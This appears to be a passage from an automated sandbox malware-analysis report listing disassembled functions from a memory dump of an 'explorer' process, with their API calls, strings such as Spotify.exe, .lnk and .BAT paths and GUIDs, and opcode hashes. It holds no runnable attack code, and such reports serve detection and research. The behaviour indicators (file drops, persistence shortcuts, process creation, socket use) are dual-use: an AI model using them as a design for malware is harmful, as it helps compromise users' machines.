                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AllocCreateEvent$ErrorLastwnsprintf$CloseDirectoryFileHandleOpenProcessclosesocketsetsockoptshutdown
                          • String ID: "%s" %s$%s%s$Spotify.exe$h${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}
                          • API String ID: 16435842-1927095226
                          • Opcode ID: 9e89ed8c19ecba7075bface1c20789852e7befcd0a498730b83c385b5a8a6b61
                          • Instruction ID: 7afb8e7ea08025069f6a805ef19aa4134a35d868352b1bd584deb0f45a3be109
                          • Opcode Fuzzy Hash: 9e89ed8c19ecba7075bface1c20789852e7befcd0a498730b83c385b5a8a6b61
                          • Instruction Fuzzy Hash: E171E536208B8586EB749F14F4543DAB7A0F788748F50412AEB8E47B68DF7CC089CB40
                          Function 0119F850 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 95memoryprocessstringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • LocalAlloc.KERNEL32 ref: 0119F88C
                          • LocalFree.KERNEL32 ref: 0119FA3D
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • LocalAlloc.KERNEL32 ref: 0119F8D4
                          • GetModuleFileNameW.KERNEL32 ref: 0119F8F8
                          • lstrcmpiW.KERNEL32 ref: 0119F910
                          • LocalAlloc.KERNEL32 ref: 0119F928
                          • CreateProcessW.KERNEL32 ref: 0119F9D9
                          • LocalFree.KERNEL32 ref: 0119F9E9
                          • LocalFree.KERNEL32 ref: 0119F9F4
                          • LocalFree.KERNEL32 ref: 0119F9FF
                          • LocalFree.KERNEL32 ref: 0119FA0A
                          • LocalFree.KERNEL32 ref: 0119FA1C
                          • LocalFree.KERNEL32 ref: 0119FA27
                          • LocalFree.KERNEL32 ref: 0119FA32
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$lstrlen$CreateFileFolderKnownModuleNamePathProcessTask_errno_invalid_parameter_noinfolstrcmpi
                          • String ID: "%s%s" %s$%s%s$Spotify.exe$h${72A3B189-93CE-456F-B494-1FB1DB2DA359}
                          • API String ID: 2909854553-2820493250
                          • Opcode ID: 06ff2f03f017136b877fb76b6e4b697c3f15a49a82f8356fb0cfb4661937b634
                          • Instruction ID: 098a2825e59c6ec4363788d7eac3425fb4df918ca7cff172dadc7d818178f69d
                          • Opcode Fuzzy Hash: 06ff2f03f017136b877fb76b6e4b697c3f15a49a82f8356fb0cfb4661937b634
                          • Instruction Fuzzy Hash: B451D975218F8582EB289F55F8843DAB7A1F784798F500129EB9A87B68DF7CD446CF00
                          Function 011A05B0 Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 77memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01194277), ref: 011A05CB
                          • SHGetKnownFolderPath.SHELL32 ref: 011A05EF
                          • DeleteFileW.KERNEL32 ref: 011A0625
                          • CoTaskMemFree.COMBASE ref: 011A0630
                          • LocalFree.KERNEL32 ref: 011A063B
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • SHGetKnownFolderPath.SHELL32 ref: 011A0652
                          • LocalAlloc.KERNEL32 ref: 011A066A
                          • LocalAlloc.KERNEL32 ref: 011A06B2
                          • DeleteFileW.KERNEL32 ref: 011A06FD
                          • RemoveDirectoryW.KERNEL32 ref: 011A0708
                          • LocalFree.KERNEL32 ref: 011A0713
                          • LocalFree.KERNEL32 ref: 011A071E
                          • CoTaskMemFree.COMBASE ref: 011A0729
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DeleteFileFolderKnownPathTask$DirectoryRemove_errno_invalid_parameter_noinfo
                          • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT${59F96D5E-CD6F-4CE9-A7AC-B25AA1603F57}${6DB2FA6A-A410-4600-BDD4-784394A68FBE}${86AF6429-A287-4799-A229-A26E86AD3DD4}
                          • API String ID: 2670229135-1971567089
                          • Opcode ID: ee807f0401cb86cae143b0ceb8c4b664d2171896d18112f7cba7b98ddbca63bf
                          • Instruction ID: 684e2f9eac7879e2aa8f2cd6f84532c21a1c07b8cc9bb3ec3ded056258d22799
                          • Opcode Fuzzy Hash: ee807f0401cb86cae143b0ceb8c4b664d2171896d18112f7cba7b98ddbca63bf
                          • Instruction Fuzzy Hash: 6241D835214E8582E718AF54E8547DAA765FBC8B59F900136FB8E47A68DF3CC446CB00
                          Function 011BBBC4 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B858C: RtlLookupFunctionEntry.KERNEL32 ref: 011B8600
                          • __GetUnwindTryBlock.LIBCMT ref: 011BBC28
                          • __SetUnwindTryBlock.LIBCMT ref: 011BBC4F
                            • Part of subcall function 011B8F9C: RaiseException.KERNEL32 ref: 011B9017
                          • __GetUnwindTryBlock.LIBCMT ref: 011BBC59
                          • _getptd.LIBCMT ref: 011BBCAF
                          • _getptd.LIBCMT ref: 011BBCC2
                          • _getptd.LIBCMT ref: 011BBCCE
                          • _SetThrowImageBase.LIBCMT ref: 011BBCE2
                          • _getptd.LIBCMT ref: 011BBD32
                          • _getptd.LIBCMT ref: 011BBD45
                          • _getptd.LIBCMT ref: 011BBD51
                          • type_info::operator==.LIBCMT ref: 011BBDB8
                          • std::exception::exception.LIBCMT ref: 011BBDF1
                          • _getptd.LIBCMT ref: 011BC024
                          • std::exception::exception.LIBCMT ref: 011BC09D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                          • String ID: bad exception$csm$csm$csm
                          • API String ID: 1639654010-820278400
                          • Opcode ID: bf0900ad2434befe3400db7cfff43b82b0c2f0a01f0478dde28f429e9c436658
                          • Instruction ID: d14d67d9d5d2737df3164be16f1456346bfdaf9932c5391c083a426838f969b7
                          • Opcode Fuzzy Hash: bf0900ad2434befe3400db7cfff43b82b0c2f0a01f0478dde28f429e9c436658
                          • Instruction Fuzzy Hash: 8AD1BC366046428ADB2CEF6AE0C03EE3BA5FB59B8CF444529DF4A57B14DB38C055C74A
                          Function 0119FBA0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 93memoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • CreateDirectoryW.KERNEL32 ref: 0119FBD8
                          • GetLastError.KERNEL32 ref: 0119FBE3
                          • LocalAlloc.KERNEL32 ref: 0119FBFE
                          • CreateFileW.KERNEL32 ref: 0119FC6E
                          • GetLastError.KERNEL32 ref: 0119FC79
                          • LocalFree.KERNEL32 ref: 0119FD16
                          • LocalFree.KERNEL32 ref: 0119FD21
                          • LocalFree.KERNEL32 ref: 0119FD77
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$lstrlen$AllocCreateErrorLast$DirectoryFileFolderKnownPathTask
                          • String ID: %s%s$P$Spotify.exe
                          • API String ID: 1076749940-165710436
                          • Opcode ID: 32dc2ba4640cc6b29abbf1b903f9919c59af73a514772881ca3c4c76981817d0
                          • Instruction ID: c9901924cc782295b7fccd0783cf82a71323cd3bd38b2c902031e50dd40073dd
                          • Opcode Fuzzy Hash: 32dc2ba4640cc6b29abbf1b903f9919c59af73a514772881ca3c4c76981817d0
                          • Instruction Fuzzy Hash: 4851BB72108B4582EB189F59F45439ABBA1F7857A4F504325E7B986AE8CF7CD486CF00
                          Function 011995E0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 95memorystringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryFreeLocal$AllocCreateRemoveTasklstrlen$ErrorFolderKnownLastPath_errno_invalid_parameter_noinfo
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 2435737201-2868705786
                          • Opcode ID: cb6a53061595a734b3ffb404d5d524841b0ff543565ec5e479e2d7b72e22f29c
                          • Instruction ID: 3a9ae06411d1e8f70d6fbf718da7fe836c3e9723b34520bfbd9985db950d562b
                          • Opcode Fuzzy Hash: cb6a53061595a734b3ffb404d5d524841b0ff543565ec5e479e2d7b72e22f29c
                          • Instruction Fuzzy Hash: 4341AB36218EC882EB78DF55E8983DEA361F7C4B49F440129D79E86A68DF3CC545CB40
                          Function 011B3700 Relevance: 27.1, APIs: 18, Instructions: 144networkmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                          • String ID:
                          • API String ID: 3749125693-0
                          • Opcode ID: ab3eea892a186c8f415dfd69d647a73de8c8795c931a51a3e3e063b1915f807a
                          • Instruction ID: fced647d15f7a325750b2b02ae38b4e45193fb4d453415cc59be3f36d19fd668
                          • Opcode Fuzzy Hash: ab3eea892a186c8f415dfd69d647a73de8c8795c931a51a3e3e063b1915f807a
                          • Instruction Fuzzy Hash: 81712876228A848BD768DF18E48439AB7B0F7C5B94F104129FB9A83B68DB7DC445CF00
                          Function 01199AC0 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 77memoryfilesynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                          • String ID: %s\%s${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 2734627627-2176222248
                          • Opcode ID: 912e0dc201dffbad20480d1b529e4bd6e96b9eb1640e8f8740d2ceca69766de1
                          • Instruction ID: 7bae667cb28f522e950f261fde0b503bd9664201a79b3a3afb7dcc1018ce71e3
                          • Opcode Fuzzy Hash: 912e0dc201dffbad20480d1b529e4bd6e96b9eb1640e8f8740d2ceca69766de1
                          • Instruction Fuzzy Hash: 9241DE31104A8582EB28AF55F8593DAB7A1F7C5779F500329E7BA46AE4CF7DC486CB00
                          Function 011B39D0 Relevance: 25.6, APIs: 17, Instructions: 138networkmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                          • String ID:
                          • API String ID: 3749125693-0
                          • Opcode ID: 3debd0d67c792c8ed78d53c9fb1e462fadb46e27df6da0f3ab6e728a298b66de
                          • Instruction ID: f583519df44dd3d1bcae6d090553f89ee116fcf43973d2641bebedfdd523771d
                          • Opcode Fuzzy Hash: 3debd0d67c792c8ed78d53c9fb1e462fadb46e27df6da0f3ab6e728a298b66de
                          • Instruction Fuzzy Hash: 34611776228A848BD768DF19E48439AB7B0F7C5B94F104129FB9A83B68CB7DC455CF00
                          Function 011A74C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 107filememorystringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFileFreeHandle$AllocCreateWritelstrcpy
                          • String ID: .DLL
                          • API String ID: 3665100274-899428287
                          • Opcode ID: fadf7f4ced62afc3b5a9d5cf5047a3c075f10af8471f2c9751082e67500787e9
                          • Instruction ID: d4f9a81e87c932e3dfceefa904636de998290c273cd79eca637867d81e950db5
                          • Opcode Fuzzy Hash: fadf7f4ced62afc3b5a9d5cf5047a3c075f10af8471f2c9751082e67500787e9
                          • Instruction Fuzzy Hash: 7B511676208A84C6D729DB18F8843DAB7A1F388798F400225E7DD87BA8DB7DC595CB00
                          Function 011AD420 Relevance: 21.1, APIs: 14, Instructions: 92memorynetworkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Allocgethostbynameinet_addrtype_info::_name_internal_method
                          • String ID:
                          • API String ID: 156840946-0
                          • Opcode ID: 098c5ea84026b567fb2971d524b6f063d13c904a181ddb1c622f1b57d480886b
                          • Instruction ID: 4d39b6a8363a61b68098eb7a2f2ae6e1984eeb051616a6a180a1bc6076313814
                          • Opcode Fuzzy Hash: 098c5ea84026b567fb2971d524b6f063d13c904a181ddb1c622f1b57d480886b
                          • Instruction Fuzzy Hash: 9341A876618E4486DB24DB25F48435AB7B0F7C8B98F500625EA8E83B28DF3CC5418B00
                          Function 011B2610 Relevance: 21.1, APIs: 14, Instructions: 65synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 6516c26c68dd897548ead927ca7065ad2063d221f15682583de06161732488cb
                          • Instruction ID: 6f407d3e16cd725d7773616dcd92840e552feadbcd761eedfa853d9f7c7713a6
                          • Opcode Fuzzy Hash: 6516c26c68dd897548ead927ca7065ad2063d221f15682583de06161732488cb
                          • Instruction Fuzzy Hash: 66413C74210D0882F71DBB29ED987E46765FB90B59F540239E72A866B0CF7D98CBC740
                          Function 0119F660 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 60memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetKnownFolderPath.SHELL32 ref: 0119F67A
                          • LocalAlloc.KERNEL32 ref: 0119F692
                          • wnsprintfW.SHLWAPI ref: 0119F6CF
                          • LocalFree.KERNEL32 ref: 0119F76B
                            • Part of subcall function 0119ECE0: AllocateAndInitializeSid.ADVAPI32 ref: 0119ED6A
                            • Part of subcall function 0119ECE0: SetEntriesInAclW.ADVAPI32 ref: 0119EDE6
                            • Part of subcall function 0119ECE0: LocalAlloc.KERNEL32 ref: 0119EE01
                            • Part of subcall function 0119ECE0: InitializeSecurityDescriptor.ADVAPI32 ref: 0119EE27
                            • Part of subcall function 0119ECE0: SetSecurityDescriptorDacl.ADVAPI32 ref: 0119EE46
                          • CreateDirectoryW.KERNEL32 ref: 0119F713
                          • GetLastError.KERNEL32 ref: 0119F71E
                          • LocalFree.KERNEL32 ref: 0119F730
                          • LocalFree.KERNEL32 ref: 0119F73B
                          • CoTaskMemFree.COMBASE ref: 0119F746
                          • LocalFree.KERNEL32 ref: 0119F760
                          • CoTaskMemFree.COMBASE ref: 0119F776
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
